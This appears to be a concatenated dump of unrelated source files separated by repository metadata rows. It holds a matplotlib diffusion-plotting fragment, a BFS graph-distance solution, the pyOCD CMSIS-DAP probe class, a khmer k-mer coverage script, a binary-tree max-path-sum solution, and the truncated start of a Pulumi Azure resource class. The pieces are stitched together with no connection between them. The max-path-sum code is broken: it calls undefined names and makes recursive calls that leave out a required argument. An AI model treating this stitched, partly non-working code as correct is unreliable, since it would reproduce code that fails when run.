binCenters = [0.5 * (bins[k] + bins[k+1]) for k in range(len(counts))]
binWidth = bins[1] - bins[0]
ax1.scatter(binCenters, counts,
s = 10.0,
marker = 'o',
facecolors = 'None',
edgecolors = RGBcolorValue,
linewidth = 0.65,
label = labels[i],
zorder = 3)
ax1.plot([x0Value, x0Value], [-0.2, 1.0],
lw = 0.5,
color = '#CCCCCC',
alpha = 1.0,
dashes = [6.0, 3.0],
zorder = 1)
######################################################################################
######################################################################################
# dummy plot
handles = []
p, = ax1.plot([-999.0],[-999.0],
lw = 1.25,
color = 'k')
handles.append(p)
labels = [r'FPE (analytical)']
Dleg = plt.legend(handles,
labels,
fontsize = 5.5,
loc = 'upper left',
bbox_to_anchor = [0.0, 1.11],
handlelength = 2.0)
Dleg.draw_frame(False)
plt.gca().add_artist(Dleg)
for k, spine in ax1.spines.items(): #ax.spines is a dictionary
spine.set_zorder(10)
######################################################################################
######################################################################################
######################################################################################
# figure legend
leg = ax1.legend(loc = 'upper right',
handlelength = 1.0,
scatterpoints = 1,
markerscale = 1.5,
ncol = 1)
for i, legobj in enumerate(leg.legendHandles):
legobj.set_linewidth(1.0)
leg.draw_frame(False)
######################################################################################
# set plot range
ax1.set_xlim(-4.2, 4.2)
ax1.set_ylim(-0.015, 0.63)
######################################################################################
# grid options
if (grid):
ax1.grid(color = 'gray', alpha = 0.15, lw = 0.3, linestyle = 'dashed', dashes = [4.0, 1.5])
######################################################################################
# inlet (ax2 object) first moments
ax2 = f.add_axes([0.24, 0.40, 0.18, 0.18])
for axis in ['top', 'bottom', 'left', 'right']:
ax2.spines[axis].set_linewidth(0.35)
ax2.tick_params('both', length = 1.5, width = 0.35, which = 'major', pad = 3.0)
ax2.tick_params('both', length = 1.0, width = 0.25, which = 'minor', pad = 3.0)
ax2.tick_params(axis='x', which='major', pad = 1.0)
ax2.tick_params(axis='y', which='major', pad = 1.0, zorder = 10)
labelfontsize = 4.0
for tick in ax2.xaxis.get_major_ticks():
tick.label.set_fontsize(labelfontsize)
for tick in ax2.yaxis.get_major_ticks():
tick.label.set_fontsize(labelfontsize)
major_x_ticks = np.arange(0.0, 15.1, 5.0)
minor_x_ticks = np.arange(0.0, 15.1, 1.0)
ax2.set_xticks(major_x_ticks)
ax2.set_xticks(minor_x_ticks, minor = True)
major_y_ticks = np.arange(0.0, 2.55, 1.0)
minor_y_ticks = np.arange(0.0, 2.55, 0.5)
ax2.set_yticks(major_y_ticks)
ax2.set_yticks(minor_y_ticks, minor = True)
firstMoments = np.mean(X, axis = 1)
ax2.scatter(sampleTimes, firstMoments,
s = 6.0,
marker = 'o',
facecolors = 'None',
edgecolors = 'k',
linewidth = 0.35,
zorder = 3)
xVals = np.linspace(-2.0, 12.0, 1500)
yVals = [x0Value * np.exp(-t) for t in xVals]
ax2.plot(xVals, yVals,
lw = 0.75,
alpha = 1.0,
color = '#666666',
zorder = 1,
label = r'$\langle x \rangle(t) = x_0e^{-t}$')
leg = ax2.legend(bbox_to_anchor = [0.035, 1.02],
loc = 'upper left',
fontsize = 3.75,
handlelength = 1.0,
scatterpoints = 1,
markerscale = 1.5,
ncol = 1)
leg.draw_frame(False)
ax2.set_xlabel(r'time $t$', fontsize = 4.0)
ax2.set_ylabel(r'$\langle x \rangle (t)$', fontsize = 4.0)
ax2.xaxis.labelpad = 1.0
ax2.yaxis.labelpad = 1.0
ax2.set_xlim(-0.5, 11.5)
ax2.set_ylim(-0.22, 2.25)
ax2.grid(color = 'gray', alpha = 0.25, lw = 0.35, linestyle = 'dashed', dashes = [4.0, 3.0])
######################################################################################
# inlet (ax3 object) MSD plot
ax3 = f.add_axes([0.24, 0.66, 0.25, 0.24])
for axis in ['top', 'bottom', 'left', 'right']:
ax3.spines[axis].set_linewidth(0.35)
ax3.tick_params('both', length = 1.5, width = 0.35, which = 'major', pad = 3.0)
ax3.tick_params('both', length = 1.0, width = 0.25, which = 'minor', pad = 3.0)
ax3.tick_params(axis='x', which='major', pad = 1.0)
ax3.tick_params(axis='y', which='major', pad = 1.0, zorder = 10)
labelfontsize = 4.0
for tick in ax3.xaxis.get_major_ticks():
tick.label.set_fontsize(labelfontsize)
for tick in ax3.yaxis.get_major_ticks():
tick.label.set_fontsize(labelfontsize)
major_x_ticks = np.arange(0.0, 15.1, 5.0)
minor_x_ticks = np.arange(0.0, 15.1, 1.0)
ax3.set_xticks(major_x_ticks)
ax3.set_xticks(minor_x_ticks, minor = True)
major_y_ticks = np.arange(0.0, 1.65, 0.5)
minor_y_ticks = np.arange(0.0, 1.65, 0.1)
ax3.set_yticks(major_y_ticks)
ax3.set_yticks(minor_y_ticks, minor = True)
ax3.scatter(sampleTimes, MSD,
s = 6.0,
marker = 'o',
facecolors = 'None',
edgecolors = 'k',
linewidth = 0.35,
zorder = 3)
xVals = np.linspace(0.0001, 12.0, 1500)
yVals = [ (1.0 - np.exp(-2.0 * t)) for t in xVals]
ax3.plot(xVals, yVals,
lw = 0.75,
alpha = 1.0,
color = '#666666',
zorder = 1,
label = r'MSD$(t) = D\left(1-e^{-2t}\right)$')
leg = ax3.legend(bbox_to_anchor = [-0.03, 1.02],
loc = 'upper left',
handlelength = 1.5,
fontsize = 4.0,
scatterpoints = 1,
markerscale = 1.0,
ncol = 1)
leg.draw_frame(False)
ax3.set_xlabel(r'time $t$', fontsize = 4.0)
ax3.set_ylabel(r'MSD$(t)$', fontsize = 4.0)
ax3.xaxis.labelpad = 1.0
ax3.yaxis.labelpad = 1.5
ax3.set_xlim(0.0, 11.5)
ax3.set_ylim(0.0, 1.35)
ax3.grid(color = 'gray', alpha = 0.25, lw = 0.35, linestyle = 'dashed', dashes = [4.0, 3.0])
######################################################################################
# save to file
if (datestamp):
outname += '_' + now
if (savePDF):
f.savefig(os.path.join(outdir, outname) + '.pdf', dpi = 300, transparent = False)
if (savePNG):
f.savefig(os.path.join(outdir, outname) + '.png', dpi = 600, transparent = False)
plt.clf()
plt.close()
return None
def FPE_drift(x, x0, t):
    """Transient solution of the Fokker-Planck equation with linear drift
    (Ornstein-Uhlenbeck process): a Gaussian with mean x0*exp(-t) and
    variance 1 - exp(-2t), evaluated at position x and time t."""
    mean = x0 * np.exp(-t)
    variance = 1.0 - np.exp(-2.0 * t)
    normalization = np.sqrt(2.0 * np.pi * variance)
    return np.exp(-(x - mean) ** 2 / (2.0 * variance)) / normalization
if __name__ == '__main__':
    # Post-process sampled trajectories of diffusion in a harmonic potential:
    # load the raw trajectory matrix, compute first moments and MSD at the
    # chosen sample times, and render the summary figure.
    filename = '03_harmonicDiffusion_m_10000_dt_1e-03.txt'
    outname = filename.split('.')[0]
    # Trajectory data as a float matrix (rows = time steps / samples).
    X = np.genfromtxt(os.path.join(RAWDIR, filename))
    # print() call form is valid in both Python 2 and 3 for a single argument.
    print(X.shape)
    # NOTE(review): x0Value is unused in this block; it may be read as a
    # module-level global by Plot() (whose full body is not visible here) --
    # confirm before removing.
    x0Value = 2.0
    sampleTimes = [0.5, 1.0, 3.0, 5.0, 10.0]
    firstMoments, MSD = getMoments(X, sampleTimes)
    print(firstMoments)
    print(MSD)
    Plot(titlestr = '',
         X = X,
         MSD = MSD,
         outname = outname,
         outdir = OUTDIR,
         grid = False)
| [
"[email protected]"
] | |
c9bc8a15f2a2ae16fac4e0306ec4fcea3554ba9f | cfa35020cd963c013583a6bb1c862fa9884f2bf4 | /Algorithm/SWEA/D2/5102_d2_노드의거리.py | cb148321280b3370741cf95b6f7e552d7fd1bf8e | [] | no_license | LeeSungRyul/TIL | c16b4ef35be3226a6f9aedcc4b7c457d10de781a | 0c085e654d4e72c84c9aa10ceca4a54b834a4c63 | refs/heads/master | 2023-08-21T11:09:49.575813 | 2021-10-15T14:02:36 | 2021-10-15T14:02:36 | 335,647,426 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,210 | py | from collections import deque
T = int(input())
def bfs(start):
queue = deque()
queue.append(start)
visited[start] = 1
while queue:
cur = queue.popleft()
for nxt in G[cur]: # 인접 리스트 접근
if nxt == end:
return visited[cur] # 시작점을 1로 두고 계산했으므로 nxt까지의 거리에서 1을 뺀 cur 좌표까지의 거리 return
if not visited[nxt]:
visited[nxt] = visited[cur] + 1
queue.append(nxt)
return 0 # while 다 돈 경우, 목적지에 도착할 수 없으므로 return 0
# For each test case: read the graph, then report the shortest distance
# between the two query nodes (0 when unreachable).
for tc in range(1, T + 1):
    V, E = map(int, input().split())
    # Adjacency dictionary: node -> list of neighbors (undirected graph,
    # nodes numbered 1..V; index 0 unused).
    G = {i: [] for i in range(V + 1)}
    for _ in range(E):
        node1, node2 = map(int, input().split())
        G[node1].append(node2)
        G[node2].append(node1)
    start, end = map(int, input().split())
    visited = [0 for _ in range(V + 1)]
    print("#{} {}".format(tc, bfs(start)))
| [
"[email protected]"
] | |
5ddb305889d68d304ff09e2f3d620e3971d7277f | 4943edd96703a0c993ce41854093ea0fc9da9f63 | /pyocd/probe/cmsis_dap_probe.py | fb6a5ac899ea018693edacd527f930ad23ae6540 | [
"Apache-2.0"
] | permissive | wellsleep/pyOCD | f3048cda2b9b17fa9d804167fc792261df6a2d95 | a2e89c9364bad99b2b0b65bfaf6bc137be8aa901 | refs/heads/master | 2020-05-15T02:52:18.231996 | 2019-04-17T22:24:54 | 2019-04-17T22:24:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,362 | py | # pyOCD debugger
# Copyright (c) 2018 Arm Limited
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .debug_probe import DebugProbe
from ..core import exceptions
from .pydapaccess import DAPAccess
from ..board.mbed_board import MbedBoard
from ..board.board_ids import BOARD_ID_TO_INFO
import six
## @brief Wraps a pydapaccess link as a DebugProbe.
class CMSISDAPProbe(DebugProbe):
    """! @brief DebugProbe implementation backed by a CMSIS-DAP device.

    Wraps a pydapaccess DAPAccess link: converts DAPAccess exceptions to the
    pyOCD exception hierarchy and caches the DP SELECT register value to skip
    redundant SELECT writes during AP accesses.
    """
    # Masks for CMSIS-DAP capabilities.
    SWD_CAPABILITY_MASK = 1
    JTAG_CAPABILITY_MASK = 2
    # Map from DebugProbe protocol types to/from DAPAccess port types.
    PORT_MAP = {
        DebugProbe.Protocol.DEFAULT: DAPAccess.PORT.DEFAULT,
        DebugProbe.Protocol.SWD: DAPAccess.PORT.SWD,
        DebugProbe.Protocol.JTAG: DAPAccess.PORT.JTAG,
        DAPAccess.PORT.DEFAULT: DebugProbe.Protocol.DEFAULT,
        DAPAccess.PORT.SWD: DebugProbe.Protocol.SWD,
        DAPAccess.PORT.JTAG: DebugProbe.Protocol.JTAG,
    }
    # APnDP constants.
    DP = 0
    AP = 1
    # Bitmasks for AP register address fields.
    A32 = 0x0000000c
    APBANKSEL = 0x000000f0
    APSEL = 0xff000000
    APSEL_APBANKSEL = APSEL | APBANKSEL
    # Address of DP's SELECT register.
    DP_SELECT = 0x8
    # Map from AP/DP and 2-bit register address to the enums used by pydapaccess.
    REG_ADDR_TO_ID_MAP = {
        # APnDP A32
        ( 0, 0x0 ) : DAPAccess.REG.DP_0x0,
        ( 0, 0x4 ) : DAPAccess.REG.DP_0x4,
        ( 0, 0x8 ) : DAPAccess.REG.DP_0x8,
        ( 0, 0xC ) : DAPAccess.REG.DP_0xC,
        ( 1, 0x0 ) : DAPAccess.REG.AP_0x0,
        ( 1, 0x4 ) : DAPAccess.REG.AP_0x4,
        ( 1, 0x8 ) : DAPAccess.REG.AP_0x8,
        ( 1, 0xC ) : DAPAccess.REG.AP_0xC,
    }
    ## USB VID and PID pair for DAPLink firmware.
    DAPLINK_VIDPID = (0x0d28, 0x0204)
    ## @brief Return a CMSISDAPProbe for every connected CMSIS-DAP device.
    @classmethod
    def get_all_connected_probes(cls):
        try:
            return [cls(dev) for dev in DAPAccess.get_connected_devices()]
        except DAPAccess.Error as exc:
            six.raise_from(cls._convert_exception(exc), exc)
    ## @brief Construct a probe for the device with the given unique ID.
    @classmethod
    def get_probe_with_id(cls, unique_id):
        try:
            return cls(DAPAccess(unique_id))
        except DAPAccess.Error as exc:
            six.raise_from(cls._convert_exception(exc), exc)
    ## @brief Wrap an (unopened) DAPAccess link.
    def __init__(self, device):
        self._link = device
        self._supported_protocols = None
        self._protocol = None
        self._is_open = False
        # -1 marks the cached DP SELECT value as unknown/invalid.
        self._dp_select = -1
    ## @brief Human-readable probe description.
    #
    # If the first 4 characters of the unique ID match a known board ID,
    # the board database entry is used; otherwise falls back to the USB
    # vendor and product names.
    @property
    def description(self):
        try:
            board_id = self.unique_id[0:4]
            board_info = BOARD_ID_TO_INFO[board_id]
        except KeyError:
            return self.vendor_name + " " + self.product_name
        else:
            return "{0} [{1}]".format(board_info.name, board_info.target)
    @property
    def vendor_name(self):
        return self._link.vendor_name
    @property
    def product_name(self):
        return self._link.product_name
    ## @brief Only valid after opening.
    @property
    def supported_wire_protocols(self):
        return self._supported_protocols
    @property
    def unique_id(self):
        return self._link.get_unique_id()
    ## @brief Currently selected wire protocol; None until connect() succeeds.
    @property
    def wire_protocol(self):
        return self._protocol
    @property
    def is_open(self):
        return self._is_open
    def create_associated_board(self, session):
        # Only support associated Mbed boards for DAPLink firmware. We can't assume other
        # CMSIS-DAP firmware is using the same serial number format, so we cannot reliably
        # extract the board ID.
        if self._link.vidpid == self.DAPLINK_VIDPID:
            return MbedBoard(session)
        else:
            return None
    ## @brief Open the USB link and read the probe's capabilities.
    def open(self):
        try:
            self._link.open()
            self._is_open = True
            self._link.set_deferred_transfer(True)
            # Read CMSIS-DAP capabilities
            self._capabilities = self._link.identify(DAPAccess.ID.CAPABILITIES)
            self._supported_protocols = [DebugProbe.Protocol.DEFAULT]
            if self._capabilities & self.SWD_CAPABILITY_MASK:
                self._supported_protocols.append(DebugProbe.Protocol.SWD)
            if self._capabilities & self.JTAG_CAPABILITY_MASK:
                self._supported_protocols.append(DebugProbe.Protocol.JTAG)
        except DAPAccess.Error as exc:
            six.raise_from(self._convert_exception(exc), exc)
    ## @brief Close the USB link.
    def close(self):
        try:
            self._link.close()
            self._is_open = False
        except DAPAccess.Error as exc:
            six.raise_from(self._convert_exception(exc), exc)
    # ------------------------------------------- #
    #          Target control functions
    # ------------------------------------------- #
    def connect(self, protocol=None):
        """Initialize DAP IO pins for JTAG or SWD"""
        # Convert protocol to port enum.
        if protocol is not None:
            port = self.PORT_MAP[protocol]
        else:
            port = DAPAccess.PORT.DEFAULT
        try:
            self._link.connect(port)
        except DAPAccess.Error as exc:
            six.raise_from(self._convert_exception(exc), exc)
        # Read the current mode and save it.
        actualMode = self._link.get_swj_mode()
        self._protocol = self.PORT_MAP[actualMode]
        self._invalidate_cached_registers()
    # TODO remove
    def swj_sequence(self):
        """Send sequence to activate JTAG or SWD on the target"""
        try:
            self._link.swj_sequence()
        except DAPAccess.Error as exc:
            six.raise_from(self._convert_exception(exc), exc)
    def disconnect(self):
        """Deinitialize the DAP I/O pins"""
        try:
            self._link.disconnect()
            self._protocol = None
            self._invalidate_cached_registers()
        except DAPAccess.Error as exc:
            six.raise_from(self._convert_exception(exc), exc)
    def set_clock(self, frequency):
        """Set the frequency for JTAG and SWD in Hz
        This function is safe to call before connect is called.
        """
        try:
            self._link.set_clock(frequency)
        except DAPAccess.Error as exc:
            six.raise_from(self._convert_exception(exc), exc)
    def reset(self):
        """Reset the target"""
        try:
            self._invalidate_cached_registers()
            self._link.reset()
        except DAPAccess.Error as exc:
            six.raise_from(self._convert_exception(exc), exc)
    def assert_reset(self, asserted):
        """Assert or de-assert target reset line"""
        try:
            self._invalidate_cached_registers()
            self._link.assert_reset(asserted)
        except DAPAccess.Error as exc:
            six.raise_from(self._convert_exception(exc), exc)
    def is_reset_asserted(self):
        """Returns True if the target reset line is asserted or False if de-asserted"""
        try:
            return self._link.is_reset_asserted()
        except DAPAccess.Error as exc:
            six.raise_from(self._convert_exception(exc), exc)
    def flush(self):
        """Write out all unsent commands"""
        try:
            self._link.flush()
        except DAPAccess.Error as exc:
            six.raise_from(self._convert_exception(exc), exc)
    # ------------------------------------------- #
    #          DAP Access functions
    # ------------------------------------------- #
    ## @brief Read a DP register.
    #
    # @param self
    # @param addr Integer register address being one of (0x0, 0x4, 0x8, 0xC).
    # @param now Boolean; when False a callback is returned for a deferred read.
    #
    # @todo Handle auto DPBANKSEL.
    def read_dp(self, addr, now=True):
        reg_id = self.REG_ADDR_TO_ID_MAP[self.DP, addr]
        try:
            result = self._link.read_reg(reg_id, now=now)
        except DAPAccess.Error as error:
            self._invalidate_cached_registers()
            six.raise_from(self._convert_exception(error), error)
        # Read callback returned for async reads.
        def read_dp_result_callback():
            try:
                return result()
            except DAPAccess.Error as error:
                self._invalidate_cached_registers()
                six.raise_from(self._convert_exception(error), error)
        return result if now else read_dp_result_callback
    ## @brief Write a DP register, skipping redundant SELECT writes.
    def write_dp(self, addr, data):
        reg_id = self.REG_ADDR_TO_ID_MAP[self.DP, addr]
        # Skip writing DP SELECT register if its value is not changing.
        if addr == self.DP_SELECT:
            if data == self._dp_select:
                return
            self._dp_select = data
        # Write the DP register.
        try:
            self._link.write_reg(reg_id, data)
        except DAPAccess.Error as error:
            self._invalidate_cached_registers()
            six.raise_from(self._convert_exception(error), error)
        return True
    ## @brief Read an AP register; selects the AP/bank via DP SELECT first.
    def read_ap(self, addr, now=True):
        assert type(addr) in (six.integer_types)
        ap_reg = self.REG_ADDR_TO_ID_MAP[self.AP, (addr & self.A32)]
        try:
            self.write_dp(self.DP_SELECT, addr & self.APSEL_APBANKSEL)
            result = self._link.read_reg(ap_reg, now=now)
        except DAPAccess.Error as error:
            self._invalidate_cached_registers()
            six.raise_from(self._convert_exception(error), error)
        # Read callback returned for async reads.
        def read_ap_result_callback():
            try:
                return result()
            except DAPAccess.Error as error:
                self._invalidate_cached_registers()
                six.raise_from(self._convert_exception(error), error)
        return result if now else read_ap_result_callback
    ## @brief Write an AP register; selects the AP/bank via DP SELECT first.
    def write_ap(self, addr, data):
        assert type(addr) in (six.integer_types)
        ap_reg = self.REG_ADDR_TO_ID_MAP[self.AP, (addr & self.A32)]
        # Select the AP and bank.
        self.write_dp(self.DP_SELECT, addr & self.APSEL_APBANKSEL)
        # Perform the AP register write.
        try:
            self._link.write_reg(ap_reg, data)
        except DAPAccess.Error as error:
            self._invalidate_cached_registers()
            six.raise_from(self._convert_exception(error), error)
        return True
    ## @brief Read the same AP register `count` times (e.g. bulk memory reads).
    def read_ap_multiple(self, addr, count=1, now=True):
        assert type(addr) in (six.integer_types)
        ap_reg = self.REG_ADDR_TO_ID_MAP[self.AP, (addr & self.A32)]
        try:
            # Select the AP and bank.
            self.write_dp(self.DP_SELECT, addr & self.APSEL_APBANKSEL)
            result = self._link.reg_read_repeat(count, ap_reg, dap_index=0, now=now)
        except DAPAccess.Error as exc:
            self._invalidate_cached_registers()
            six.raise_from(self._convert_exception(exc), exc)
        # Need to wrap the deferred callback to convert exceptions.
        def read_ap_repeat_callback():
            try:
                return result()
            except DAPAccess.Error as exc:
                self._invalidate_cached_registers()
                six.raise_from(self._convert_exception(exc), exc)
        return result if now else read_ap_repeat_callback
    ## @brief Write a sequence of values to the same AP register.
    def write_ap_multiple(self, addr, values):
        assert type(addr) in (six.integer_types)
        ap_reg = self.REG_ADDR_TO_ID_MAP[self.AP, (addr & self.A32)]
        try:
            # Select the AP and bank.
            self.write_dp(self.DP_SELECT, addr & self.APSEL_APBANKSEL)
            return self._link.reg_write_repeat(len(values), ap_reg, values, dap_index=0)
        except DAPAccess.Error as exc:
            self._invalidate_cached_registers()
            six.raise_from(self._convert_exception(exc), exc)
    # ------------------------------------------- #
    #          SWO functions
    # ------------------------------------------- #
    def has_swo(self):
        """! @brief Returns bool indicating whether the link supports SWO."""
        try:
            return self._link.has_swo()
        except DAPAccess.Error as exc:
            six.raise_from(self._convert_exception(exc), exc)
    def swo_start(self, baudrate):
        """! @brief Start receiving SWO data at the given baudrate."""
        try:
            self._link.swo_configure(True, baudrate)
            self._link.swo_control(True)
        except DAPAccess.Error as exc:
            six.raise_from(self._convert_exception(exc), exc)
    def swo_stop(self):
        """! @brief Stop receiving SWO data."""
        try:
            self._link.swo_configure(False, 0)
        except DAPAccess.Error as exc:
            six.raise_from(self._convert_exception(exc), exc)
    def swo_read(self):
        """! @brief Read buffered SWO data from the target.
        @return Bytearray of the received data.
        """
        try:
            return self._link.swo_read()
        except DAPAccess.Error as exc:
            six.raise_from(self._convert_exception(exc), exc)
    ## @brief Forget cached register values after errors/resets.
    def _invalidate_cached_registers(self):
        # Invalidate cached DP SELECT register.
        self._dp_select = -1
    ## @brief Map DAPAccess exceptions onto pyOCD's exception hierarchy.
    #
    # Unknown exception types are returned unchanged.
    @staticmethod
    def _convert_exception(exc):
        if isinstance(exc, DAPAccess.TransferFaultError):
            return exceptions.TransferFaultError()
        elif isinstance(exc, DAPAccess.TransferTimeoutError):
            return exceptions.TransferTimeoutError()
        elif isinstance(exc, DAPAccess.TransferError):
            return exceptions.TransferError()
        elif isinstance(exc, (DAPAccess.DeviceError, DAPAccess.CommandError)):
            return exceptions.ProbeError(str(exc))
        elif isinstance(exc, DAPAccess.Error):
            return exceptions.PyOCDError(str(exc))
        else:
            return exc
| [
"[email protected]"
] | |
345fd054c1b316d116d5b930809e3288f775f9f4 | 6bb91e13994476f58db50374972825650cfaa0b9 | /count-median-norm.py | 798a733ade9ed282759117466c1cb4ec3a695154 | [] | no_license | ctb/2015-khmer-wok3-counting | cdf4d15137b1a214619cfaf9b00bc0b6752c28de | 99819ed152bf0f23db9797fd4b79bd6eb9bfc9eb | refs/heads/master | 2021-01-16T18:57:07.013341 | 2015-05-20T11:22:06 | 2015-05-20T11:22:06 | 34,345,558 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,966 | py | #! /usr/bin/env python2
#
# This file is part of khmer, https://github.com/dib-lab/khmer/, and is
# Copyright (C) Michigan State University, 2009-2015. It is licensed under
# the three-clause BSD license; see LICENSE.
# Contact: [email protected]
#
# pylint: disable=missing-docstring,invalid-name
"""
Adapted from count-median.py in khmer 1.4
"""
import screed
import argparse
import sys
import csv
import textwrap
import khmer
from khmer.kfile import check_input_files, check_space
from khmer.khmer_args import info
def kmers(seq, K):
    """Yield every K-length substring of seq, left to right.

    Yields nothing when len(seq) < K.
    """
    last_start = len(seq) - K
    pos = 0
    while pos <= last_start:
        yield seq[pos:pos + K]
        pos += 1
def get_parser():
    """Build the command-line parser.

    Positional arguments, in order: the reads counting table, the exon
    counting table, and the transcripts file.
    """
    parser = argparse.ArgumentParser()
    for name in ('ct_reads', 'ct_exon', 'transcripts'):
        parser.add_argument(name)
    return parser
def main():
    """For each transcript, print coverage summaries derived from k-mer
    counts: the average read count over k-mers present in the exon table,
    that average normalized by the exon counts, and the normalized average
    recomputed over the graph-aligned sequence.  One space-separated
    output line per transcript.
    """
    args = get_parser().parse_args()
    # reads counting table
    ct_reads = khmer.load_counting_hash(args.ct_reads)
    # transcripts counting table
    ct_exon = khmer.load_counting_hash(args.ct_exon)
    # transcripts themselves
    transcripts = args.transcripts
    K = ct_reads.ksize()
    # both counting tables must use the same k-mer size
    assert ct_exon.ksize() == K
    # build a read aligner against, well, the reads:
    aligner = khmer.ReadAligner(ct_reads, 1, 1.0)
    # run through the transcripts.
    for record in screed.open(transcripts):
        counts = [] # not norm by exon count
        counts2 = [] # norm by exon count
        counts3 = [] # aligned & norm by exon count
        # replace 'N' bases with 'A' before k-mer lookups
        seq = record.sequence.replace('N', 'A')
        # x is the median k-mer count for this sequence (y, z unused)
        x, y, z = ct_reads.get_median_count(seq)
        if x == 0: # skip
            continue
        # first, do straight k-mer distribution
        for kmer in kmers(seq, K):
            exon_count = ct_exon.get(kmer)
            if exon_count:
                count = ct_reads.get(kmer)
                counts.append(count)
                counts2.append(count / float(exon_count))
        # next, do aligned k-mer distribution, normalized
        score, alignment, _, trunc = aligner.align(seq)
        alignment = alignment.replace('-', '')
        for pos in range(len(alignment) - K + 1):
            kmer = alignment[pos:pos + K]
            exon_count = ct_exon.get(kmer)
            if exon_count:
                count = ct_reads.get(kmer)
                counts3.append(count / float(exon_count))
        # calculate summaries
        # NOTE(review): raises ZeroDivisionError when no k-mer of this
        # transcript is present in the exon table (counts empty) -- the
        # x == 0 guard above does not prevent that case; verify inputs.
        avg = sum(counts) / float(len(counts))
        # NOTE(review): divides by len(counts) rather than len(counts2);
        # the two lists always have equal length here (appended together),
        # but len(counts2) would be clearer.
        avg2 = sum(counts2) / float(len(counts))
        avg3 = 0.0
        if counts3:
            avg3 = sum(counts3) / float(len(counts3))
        # check to see if the alignment was truncated; set to numerical
        if trunc:
            trunc = 1
        else:
            trunc = 0
        # output!
        print record.name, avg, avg2, avg3, trunc, len(seq), len(alignment)
# Script entry point.
if __name__ == '__main__':
    main()
| [
"[email protected]"
] | |
79320e597beddc47d9f979c2d5bdc56d00f58d5b | 02425f5fffe5f46961c3167c46302ef84c6e48a4 | /binary_tree_maximum_path_sum/main.py | 4af5b69418f0f6d82ee0138bb1528cb0b323b288 | [] | no_license | tingleshao/leetcode | 583718b5e58c3611f3db352d82017ba1d4482f18 | e2c589a1e81282e1c3deb6dfc5cace595acb841b | refs/heads/master | 2021-01-23T03:43:31.256959 | 2015-01-23T18:00:25 | 2015-01-23T18:00:25 | 29,308,438 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,164 | py | # Definition for a binary tree node
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
# @param root, a tree node
# @return an integer
def maxPathSum(self, root):
if root == None:
return 0
mx = [root.val]
self.recNodes(root, mx)
return mx[0]
def recNodes(self, node, mx):
numl = 0
numr = 0
if node.left != None:
numl = self.recNodes(node.left)
if node.right != None:
numr = self.recNodes(node.right)
value = node.val
sumWhole = self.checkMax(value, numl+numr, mx)
if numl > 0:
sumLeft = checkmax(value,numl, mx)
else:
sumLeft = value
if numlr> 0:
sumRight = checkmax(value,numr, mx)
else:
sumRight = value
return max(sumLeft,sumRight), mx
def checkMax(self, val, sm, mx):
if sm > 0:
sm += val
else:
sm = val
if sm > mx[0]:
mx[0] = sm
return sm
def main():
    # Smoke-test hook: constructs a Solution instance; add ad-hoc tree
    # fixtures here when experimenting locally.
    s = Solution()
# Script entry point.
if __name__ == "__main__":
    main()
"[email protected]"
] | |
82377da9c55bcfaf2f676c70a0fe611dc39bc9d9 | 82b946da326148a3c1c1f687f96c0da165bb2c15 | /sdk/python/pulumi_azure_native/desktopvirtualization/v20201110preview/application_group.py | ac3871b2e01bacad414c5e2f5bbedb62ccd3a7bf | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | morrell/pulumi-azure-native | 3916e978382366607f3df0a669f24cb16293ff5e | cd3ba4b9cb08c5e1df7674c1c71695b80e443f08 | refs/heads/master | 2023-06-20T19:37:05.414924 | 2021-07-19T20:57:53 | 2021-07-19T20:57:53 | 387,815,163 | 0 | 0 | Apache-2.0 | 2021-07-20T14:18:29 | 2021-07-20T14:18:28 | null | UTF-8 | Python | false | false | 16,883 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from ._enums import *
__all__ = ['ApplicationGroupArgs', 'ApplicationGroup']
@pulumi.input_type
class ApplicationGroupArgs:
def __init__(__self__, *,
application_group_type: pulumi.Input[Union[str, 'ApplicationGroupType']],
host_pool_arm_path: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
application_group_name: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
friendly_name: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a ApplicationGroup resource.
:param pulumi.Input[Union[str, 'ApplicationGroupType']] application_group_type: Resource Type of ApplicationGroup.
:param pulumi.Input[str] host_pool_arm_path: HostPool arm path of ApplicationGroup.
:param pulumi.Input[str] resource_group_name: The name of the resource group. The name is case insensitive.
:param pulumi.Input[str] application_group_name: The name of the application group
:param pulumi.Input[str] description: Description of ApplicationGroup.
:param pulumi.Input[str] friendly_name: Friendly name of ApplicationGroup.
:param pulumi.Input[str] location: The geo-location where the resource lives
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
"""
pulumi.set(__self__, "application_group_type", application_group_type)
pulumi.set(__self__, "host_pool_arm_path", host_pool_arm_path)
pulumi.set(__self__, "resource_group_name", resource_group_name)
if application_group_name is not None:
pulumi.set(__self__, "application_group_name", application_group_name)
if description is not None:
pulumi.set(__self__, "description", description)
if friendly_name is not None:
pulumi.set(__self__, "friendly_name", friendly_name)
if location is not None:
pulumi.set(__self__, "location", location)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="applicationGroupType")
def application_group_type(self) -> pulumi.Input[Union[str, 'ApplicationGroupType']]:
"""
Resource Type of ApplicationGroup.
"""
return pulumi.get(self, "application_group_type")
@application_group_type.setter
def application_group_type(self, value: pulumi.Input[Union[str, 'ApplicationGroupType']]):
pulumi.set(self, "application_group_type", value)
@property
@pulumi.getter(name="hostPoolArmPath")
